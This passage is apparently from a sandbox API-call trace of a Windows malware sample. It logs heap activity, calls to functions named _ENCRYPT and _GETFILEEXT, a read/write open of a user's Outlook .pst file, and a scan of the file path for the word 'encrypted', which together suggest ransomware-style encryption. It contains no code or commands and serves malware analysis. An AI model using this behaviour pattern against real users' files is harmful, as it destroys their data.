[0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.698] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.698] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.698] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.698] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.698] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.699] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.699] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.699] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.699] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc58 [0036.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.699] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.700] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.700] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.700] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.700] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.700] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0036.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.701] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.701] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.701] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.701] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.701] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.701] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.701] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pst", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pst", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.701] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0036.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x777648, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x7c20c0 [0036.702] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.702] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x777648, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x7c20c0 [0036.703] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.703] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="look Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iles\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="les\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="voeimd@djhreuu.uhd.pst\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 